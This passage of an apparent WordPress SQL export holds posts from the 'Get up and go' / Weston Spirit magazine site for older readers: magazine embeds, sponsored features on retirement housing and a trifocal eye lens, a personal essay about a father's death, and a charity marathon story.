value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=121203091300-12746d9acf8949fa959c58b2d3e1700d&amp;docName=guag8&amp;username=lyonsdown&amp;loadingInfoText=Get%20up%20%26%20go&amp;showFlipBtn=true&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=121203091300-12746d9acf8949fa959c58b2d3e1700d&amp;docName=guag8&amp;username=lyonsdown&amp;loadingInfoText=Get%20up%20%26%20go&amp;showFlipBtn=true&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object><div style=\"width:610px;text-align:left;\"><a href=\"/lyonsdown/docs/guag8_mode_embed_amp_layout_http_3A_2F_2Fskin.issuu.com_2Fv_2Flight_2Flayout.xml\" target=\"_blank\">Open publication</a> - Free <a href=\"http://issuu.com/\" target=\"_blank\">publishing</a> - <a href=\"http://issuu.com/search?q=christmas\" target=\"_blank\">More christmas</a></div></div>&#13;\n<p><a href=\"http://westonspirit.org.uk/wp-content/uploads/2012/12/GUAG8_lowr.pdf\" target=\"_blank\">Downloadable PDF</a></p>&#13;\n									</div>','Get up and go – December','Christmas all wrapped up This month Get up and go brings you a special festive edition, featuring present ideas, Europe\'s best Christmas markets and','publish','open','open','','get-up-and-go-december','','','2018-04-02 20:04:18','2018-04-02 20:04:18','',0,'http://westonspirit.org.uk/get-up-and-go-december.asp',0,'post','',0),(253,1,'2014-09-19 02:20:47','2014-09-19 02:20:47','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">2 December 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/12/own-your-future-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/12/own-your-future-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/12/own-your-future-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/12/own-your-future-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/12/own-your-future-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Dreaming of the perfect retirement home but reluctant to sell your property? It’s time to wake up to the benefits of renting…?</h4>&#13;\n<p><img width=\"596\" height=\"370\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/11/Hawthorns.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">Finding a practical solution that matches the quality of your retirement living dream may be easier said than done – and renting may not automatically spring to the top of your list of possible solutions.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">However, increasing numbers of UK retirees are discovering what their counterparts in America and Australia found out a few years back – that renting your retirement home offers many advantages over continued property ownership.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Even more are discovering how you can continue to benefit from both.Hawthorns Retirement has brought its highly successful American formula for retirement living to the UK at Eastbourne, Clevedon and Braintree.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">A flexible lifestyle</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">These developments, in a nutshell, offer you continued independent living, none of the worries of home ownership and total flexibility to change your lifestyle at a month’s notice should circumstances dictate. And all this is achieved by renting your retirement home at The Hawthorns.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Your monthly rental includes all your many monthly expenses including all your meals and snacks, utility bills, housekeeping, maintenance – even a free minibus to take you to the shops and back. If you sit down and calculate what you are spending on all those items living in your own home, the rental fees appear very reasonable indeed.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">As well as the financial argument, life at The Hawthorns offers the added benefits of security, companionship and the flexibility of handing in just one month’s notice of your decision to leave.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">While many residents fund this idyllic retirement lifestyle from the proceeds of the sale of their home, many others opt to rent out their own property and fund their new-found lifestyle from the rental income, maintaining their property as part of their estate.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-subhead\">It was easy for Alan and Jean?For Alan and Jean Ward, the decision to move to The Hawthorns in Braintree was swift in the extreme. They saw an advert for the development in a paper on a Sunday morning, visited in the afternoon and signed on the dotted line the next day following a second visit.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Their decision to rent out their existing property rather than sell it was almost as quick, as Alan explains.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“Jean has Parkinson’s, I suffer with arthritis and the thought of not having to worry about shopping, cooking and all the other home maintenance chores suddenly sounded so appealing. We loved The Hawthorns the moment we stepped inside so it was an easy as well as swift decision.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“I have to admit my initial thought was to sell our own home, a three-bedroom detached bungalow in Tiptree, but after a chat with our son we realised it made more sense to rent out our bungalow. The rental income from that subsidises our rent at The Hawthorns and enables us to enjoy not only a fabulous but an affordable lifestyle.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“Of course, it makes complete sense at the moment to rent out the bungalow. With the housing market in the doldrums, I can wait two or three years for prices to pick up and then consider selling it and getting much more capital for it – very appealing.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“What’s more, we always know we still have our old home should we ever wish to return to it – which I have to say is highly unlikely, the way we feel about life here,” said Alan.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\"></p><div class=\"woo-sc-hr\"></div>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\">0800 652 3449</p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.hawthornsretirement.co.uk/\" target=\"_blank\">www.hawthornsretirement.co.uk</a></p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Own your future','Dreaming of the perfect retirement home but reluctant to sell your property? It’s time to wake up to the benefits of renting...? Finding a practical','publish','open','open','','own-your-future-3','','','2018-04-02 20:04:16','2018-04-02 20:04:16','',0,'http://westonspirit.org.uk/own-your-future-3.asp',0,'post','',0),(254,1,'2015-04-14 20:48:16','2015-04-14 20:48:16','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">2 December 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/12/the-best-of-both-worlds/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/12/the-best-of-both-worlds/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/12/the-best-of-both-worlds/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/12/the-best-of-both-worlds/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The best of both worlds\" st_url=\"http://westonspirit.org.uk/2012/12/the-best-of-both-worlds/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Deciding on a retirement home is easier than ever now you no longer have to choose between health care services and independence.</h4>&#13;\n<p><img width=\"596\" height=\"397\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/11/Chantry-court.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">Some 460,000 people in Britain live in care homes. Rather more (550,000) are in sheltered housing. A far smaller but fast-growing number are choosing to rent or buy accommodation that seeks to combine the independence of one with the support structure of the other.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The appeal is obvious. The leap between the two more standard forms of accommodation is huge. Care homes are not only expensive, and currently under some scrutiny, but they can also accelerate a loss of independence. Continuing Care Retirement Communities (CCRCs) allow and encourage you to retain independence as long as possible, but with the security blanket of a full range of services at hand.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">One illustrating the many advantages is Chantry Court in the pleasant Wiltshire market town of Westbury.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">It ticks all the boxes for older people (and their anxious families) looking for an option that is secure, designed with reduced mobility in mind, with no worries about maintenance and with a built-in community (if that is what you want) just outside your door.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Added to this, Chantry Court has all the social and leisure facilities that make these such sustainable communities – restaurant, bar, lounge, bridge room, library, hair salon, therapy room, doctor’s surgery and even a cinema… which doubles up as an exercise room. And there’s a spacious guest suite.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Moving from a family home doesn’t have to mean losing precious living space: the four penthouse units are 1200 sq ft each, the two-bedroom apartments around 800 sq ft and one-bed slightly smaller again. The feel is that of a well-appointed country hotel.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Independent living apartments at Chantry Court are from £195,000 to buy, £146,250 on shared equity or rent from £295/week. Assisted living packages are from £395/week.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\"></p><div class=\"woo-sc-hr\"></div>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\">0800 0147552</p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.chantrycourt.com/\" target=\"_blank\">www.chantrycourt.com</a></p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','The best of both worlds','Deciding on a retirement home is easier than ever now you no longer have to choose between health care services and independence. Some 460,000 people in','publish','open','open','','the-best-of-both-worlds-2','','','2018-04-02 20:04:14','2018-04-02 20:04:14','',0,'http://westonspirit.org.uk/the-best-of-both-worlds-2.asp',0,'post','',0),(255,1,'2017-08-02 03:49:28','2017-08-02 03:49:28','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">2 December 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/12/the-gift-of-sight-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/12/the-gift-of-sight-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/12/the-gift-of-sight-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/12/the-gift-of-sight-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/12/the-gift-of-sight-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>New lens gives near, middle and distance vision – and no glare.</h4>&#13;\n<p><img width=\"596\" height=\"446\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/11/London-eye-hospital.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">A UK hospital has become the first in the world to fit a new type of optic lens that promises to restore perfect sight to potentially millions of patients.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The first patient to have LEH Trifocal lenses fitted was 74-year-old tennis coach Martin Ashenden from central London. Ashenden had been diagnosed with cataracts which were getting worse and the only treatment available on the NHS would have left him wearing glasses. He said: “The NHS would only be able to offer me an operation to correct my distance vision and I’d have to wait months for that.”</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The procedure was performed by Bobby Qureshi, consultant ophthalmic surgeon and medical director of the London Eye Hospital. London Eye Hospital on Harley Street fitted the first LEH Trifocal lens this April, only a week after it was given regulatory approval. The new lens is a major step forward for multifocal lenses, which have been in use in their current form for more than a decade. Previous lenses have had to find a compromise between poor intermediate vision and glare or halos often experienced at nights, especially when driving.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Having been given little hope by the NHS procedures available, Ashenden was able to meet the consultant quickly and arrange for the life-changing procedure.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“The London Eye Hospital saw me in two days and Mr Qureshi suggested the new LEH Trifocal lenses would be suitable for my eyes, despite having a slight astigmatism in one eye. Within four days I’d had my first eye done,” he said.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">”I had anaesthetic drops in my eye then the whole thing was done in minutes. I couldn’t feel a thing. In fact it felt like nothing was happening! The old lens was removed and the LEH Trifocal lens fitted. I wore a patch over my eye for the first night but that was it – not even any discomfort or a headache.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">A real difference</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">“My eyesight is now perfect again. It was very good for both middle and distance vision and my close-up vision improved rapidly over a few days. Once I’d had my second eye done two weeks later, it was just remarkable how good my vision was</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“It’s made a real difference to my life – everything is bright and clear. Now I can go travelling and see everything from information screens in airports to scenery and vistas. I go to America regularly to see my grandchildren and now I can enjoy being with them far more.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“All the sight problems that were getting on my nerves are gone and it’s like I’m starting a new life. I’m looking forward to many more years of tennis!”</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The LEH Trifocal lens is suitable for anyone in their late 30s or older who has long or short sight, even if they have astigmatism. The lens is also suitable for anyone with cataracts, so millions of people who currently wear glasses or contact lenses could benefit – especially if previously they have avoided surgery due to the prevalence of glare problems after having traditional multifocal lenses fitted.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\"></p><div class=\"woo-sc-hr\"></div>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\">0800 612 2021</p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','The gift of sight','New lens gives near, middle and distance vision – and no glare. A UK hospital has become the first in the world to fit a new type of optic lens that','publish','open','open','','the-gift-of-sight-2','','','2018-04-02 20:04:12','2018-04-02 20:04:12','',0,'http://westonspirit.org.uk/the-gift-of-sight-2.asp',0,'post','',0),(256,1,'2015-07-09 10:19:34','2015-07-09 10:19:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">18 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get up &amp; go – March\" st_url=\"http://westonspirit.org.uk/2013/03/get-up-go-march/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get up &amp; go – March\" st_url=\"http://westonspirit.org.uk/2013/03/get-up-go-march/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get up &amp; go – March\" st_url=\"http://westonspirit.org.uk/2013/03/get-up-go-march/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get up &amp; go – March\" st_url=\"http://westonspirit.org.uk/2013/03/get-up-go-march/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get up &amp; go – March\" st_url=\"http://westonspirit.org.uk/2013/03/get-up-go-march/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>In this issue of<em> Weston Spirit</em> we talk to Sir Bobby Charlton and the man behind Les Misérables. PLUS Monica Porter, Peter Corrigan and Roderick Gilchrist</p>&#13;\n<p> </p>&#13;\n<p></p><div><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=130318180908-2be3c7a493fe4ff79044cf68c81a6fc8&amp;docName=guag_9&amp;username=lyonsdown&amp;loadingInfoText=Get%20up%20%26%20go&amp;showFlipBtn=true&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=130318180908-2be3c7a493fe4ff79044cf68c81a6fc8&amp;docName=guag_9&amp;username=lyonsdown&amp;loadingInfoText=Get%20up%20%26%20go&amp;showFlipBtn=true&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object><div style=\"width:610px;text-align:left;\"><a href=\"/lyonsdown/docs/guag_9_mode_embed_amp_backgroundColor_FFFFFF_amp_layout_http_3A_2F_2Fskin.issuu.com_2Fv_2Fcolor_2Flayout.xml\" target=\"_blank\">Open publication</a> - Free <a href=\"http://issuu.com/\" target=\"_blank\">publishing</a> - <a href=\"http://issuu.com/search?q=helath\" target=\"_blank\">More helath</a></div></div>&#13;\n<p> </p>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2013/GUAG9.pdf\" target=\"_blank\">Download PDF</a></p>&#13;\n									</div>','Get up &amp; go – March','In this issue of Get up & go we talk to Sir Bobby Charlton and the man behind Les Misérables. PLUS Monica Porter, Peter Corrigan and Roderick','publish','open','open','','get-up-go-march','','','2018-04-02 20:04:11','2018-04-02 20:04:11','',0,'http://westonspirit.org.uk/get-up-go-march.asp',0,'post','',0),(257,1,'2014-05-18 10:50:15','2014-05-18 10:50:15','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">18 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How my father’s death showed me I was not  as ruthless as I thought\" st_url=\"http://westonspirit.org.uk/2013/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How my father’s death showed me I was not  as ruthless as I thought\" st_url=\"http://westonspirit.org.uk/2013/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How my father’s death showed me I was not  as ruthless as I thought\" st_url=\"http://westonspirit.org.uk/2013/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How my father’s death showed me I was not  as ruthless as I thought\" st_url=\"http://westonspirit.org.uk/2013/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How my father’s death showed me I was not  as ruthless as I thought\" st_url=\"http://westonspirit.org.uk/2013/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>My much-loved father died recently. He was 90, long-widowed, and had been an invalid since his stroke five years ago. The death of an elderly parent is a rite of passage for the middle-aged. We know it’s the natural course of events but dread it all the same, along with the onerous process of sorting through the personal effects and deciding what to keep, what to give away or sell, what to throw out. </p>&#13;\n<p>When my brother Val and I set to this task I anticipated trouble. He is unashamedly sentimental and every bit <br /> the hoarder that our parents were. I reckoned he’d want to hold on to all manner of redundant items and envisaged myself prising our father’s old cloth cap and dressing gown out of his stubborn hands.</p>&#13;\n<p>I suppose I’m the ruthless one. But life must move on and we can’t take everything with us.</p>&#13;\n<p>My émigré family has a complex history. Originally from Hungary, we spent many years in America before moving to London, and my parents later settled in Germany. Sifting through the archive they left behind – correspondence, documents, pictures, mementoes and curiosities – felt like being on an archaeological dig. The deeper we dug the more layers of the past we unearthed.</p>&#13;\n<p>I was astonished by what my parents held on to throughout the decades and the international moves. Such as the plaintive note I’d scribbled, aged seven, after I’d been scolded for some misdemeanour. ‘Dear Dad, I like you but you don’t like me because I am bad all the time. I am going away. I left 15 cents for you. I know it’s not enough but that’s all I have. Goodbye.’ It pulled a heartstring at the time and earned its place among the family treasures.</p>&#13;\n<p>One long-unopened case contained Val’s childhood drawings (of detailed battle scenes, mostly). They were so witty and well drawn he could have been a successful cartoonist. Instead he went into insurance. Ah well.</p>&#13;\n<p>Glimpses of the past, some cheerful, some poignant, came spilling out of the dusty boxes, the overstuffed cupboards and drawers.</p>&#13;\n<p>Letters and photos bespoke our wandering lifestyle and early tribulations, my shifting relationship with my mother, my sons’ devotion, right to the end, to their Grandpa Peter. And there were keepsakes – such as the dinner menu from the ocean liner taking us to another new life in Europe – which marked the milestones in our family chronicle.</p>&#13;\n<p>Confined to a wheelchair, my father was increasingly despondent during his last few years. When the end came I was left only with the sadness of it all. But our “archaeology” brought back the adventures and achievements, the rich mosaic of his life. I saw that his closing chapter was but a small fraction of the whole. And that was wonderfully cathartic.</p>&#13;\n<p>As expected, Val hung on to a load of redundant items.</p>&#13;\n<p>Fair enough. I kept Dad’s cherished tobacco pipes – all 86 of them. I tried ruthless but it didn’t work.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p>Monica Porter is an author and freelance journalist whose articles have appeared in many British newspapers and magazines. To read more of her work see <a href=\"http://www.monicaporter.co.uk/\">www.monicaporter.co.uk</a>.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','How my father’s death showed me I was not  as ruthless as I thought','My much-loved father died recently. He was 90, long-widowed, and had been an invalid since his stroke five years ago. The death of an elderly parent is a rite','publish','open','open','','how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought','','','2018-04-02 20:04:09','2018-04-02 20:04:09','',0,'http://westonspirit.org.uk/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought.asp',0,'post','',0),(258,1,'2016-04-17 05:49:29','2016-04-17 05:49:29','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 March 2018</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\">&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How Rufus the dog puts marathon pair through paces\" st_url=\"http://westonspirit.org.uk/2013/03/how-rufus-the-dog-puts-marathon-pair-through-paces/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How Rufus the dog puts marathon pair through paces\" st_url=\"http://westonspirit.org.uk/2013/03/how-rufus-the-dog-puts-marathon-pair-through-paces/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How Rufus the dog puts marathon pair through paces\" st_url=\"http://westonspirit.org.uk/2013/03/how-rufus-the-dog-puts-marathon-pair-through-paces/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How Rufus the dog puts marathon pair through paces\" st_url=\"http://westonspirit.org.uk/2013/03/how-rufus-the-dog-puts-marathon-pair-through-paces/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How Rufus the dog puts marathon pair through paces\" st_url=\"http://westonspirit.org.uk/2013/03/how-rufus-the-dog-puts-marathon-pair-through-paces/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3233\" title=\"Virgin London Marathon 2010\" src=\"/wp-content/uploads/2013/03/marathonrunners-300x203.jpg\" alt=\"\" width=\"300\" height=\"203\" /></h3>&#13;\n<h3 style=\"text-align: center;\">Team Run For It are preparing to run the London Marathon to raise money for dementia sufferers.</h3>&#13;\n<p> </p>&#13;\n<p>After months of rigourous preparation with “personal trainer” Rufus, an Irish setter who accompanies 52-year-old Stephanie Atkinson of Ilkley, West Yorkshire, and her daughter Emily on weekly runs, the duo are ready to take on London. The London Marathon, that is.</p>&#13;\n<p>As runners for the charity Team Run For It, Emily and her mother will participate in the 26-mile race next month (sans Rufus) to raise money to help the lives of older people.</p>&#13;\n<p>Charities Age UK and YouthNet have joined forces for the 2018 Virgin London Marathon to create Team Run For It, with the mission of bringing young and old people together to combat the loneliness and isolation that many elderly folk endure. Their aim is to get older people online and up-to-speed with the web, with the hope that they will then be able to connect with the outside world and stay in touch with loved ones.</p>&#13;\n<p>“My daughter works in a residential care home in the dementia unit,” says Stephanie, who is a GP at the Ilkley and Wharedale Medical Practice. “Because of where she works, we figured it would be a good idea to get involved with a charity that helps older people.</p>&#13;\n<h3>Connecting generations</h3>&#13;\n<p>“We heard about Age UK and saw that they were doing this project to connect older generations with younger generations. As we are people of two different generations, we thought it sounded like a good thing for us to do.”</p>&#13;\n<p>Team Run For It has 350 members, ranging from 18 to 81 years old, and requires a fundraising target of £1,850 per person. The group is just one of the 600 charity teams running in the marathon. About 25 per cent of all marathon runners are those doing so to raise money for a charity.  In fact, the London marathon is considered to be one of the biggest fundraising events in the world, collating more than £500m since the first race in 1981.</p>&#13;\n<p>To hit their fundraising target, the Atkinsons have focused on getting sponsors and money around their local town of Ilkley.</p>&#13;\n<p>“At Christmas we had a band and sang carols in one of the local supermarkets to raise money,” says Stephanie.”</p>&#13;\n<p>Neither is a novice to running: Stephanie has run one marathon before [in Edinburgh] and Emily has run two half marathons. To prepare for the big day, Emily and Stephanie do three to four runs per week; one is a longer run, the distance of which gets steadily longer as the race date gets closer. They also do two to three shorter runs.</p>&#13;\n<h3>Enjoy the day</h3>&#13;\n<p>“We’re not what I would call ‘proper runners’ – we don’t belong to a running club or anything,” says Stephanie. “We’ve been following the training plan that Team Run For It supplied to us, but we’re not trying to run it in any set time. We’re just aiming to run all the way around the course and enjoy the day.”</p>&#13;\n<p>The London Marathon takes place on April 21 and will follow a 26-mile flat course throughout the city, taking in some of London’s most famous sites and landmarks.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p>For more information about Team Run for It visit <a href=\"http://www.runforit.org.uk/\" target=\"_blank\">www.runforit.org.uk</a> or call 0800 169 87 87.<br /> To donate to Emily and Stephanie’s fundraising page visit <a href=\"http://www.virginmoneygiving.com/team/emandsteph\" target=\"_blank\">www.virginmoneygiving.com/team/emandsteph</a></p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','How Rufus the dog puts marathon pair through paces','Team Run For It are preparing to run the London Marathon to raise money for dementia sufferers.   After months of rigourous preparation with','publish','open','open','','how-rufus-the-dog-puts-marathon-pair-through-paces','','','2018-04-02 20:04:08','2018-04-02 20:04:08','',0,'http://westonspirit.org.uk/how-rufus-the-dog-puts-marathon-pair-through-paces.asp',0,'post','',0),(259,1,'2015-07-17 05:49:19','2015-07-17 05:49:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"I’m certain that golf is the best game in the world to be bad at\" st_url=\"http://westonspirit.org.uk/2013/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"I’m certain that golf is the best game in the world to be bad at\" st_url=\"http://westonspirit.org.uk/2013/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"I’m certain that golf is the best game in the world to be bad at\" st_url=\"http://westonspirit.org.uk/2013/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"I’m certain that golf is the best game in the world to be bad at\" st_url=\"http://westonspirit.org.uk/2013/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"I’m certain that golf is the best game in the world to be bad at\" st_url=\"http://westonspirit.org.uk/2013/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3235\" title=\"CDF_040213_Peter_Corrigan_39\" src=\"/wp-content/uploads/2013/03/CDF_040213_Peter_Corrigan_39-300x437.jpg\" alt=\"\" width=\"300\" height=\"437\" /></h3>&#13;\n<h3 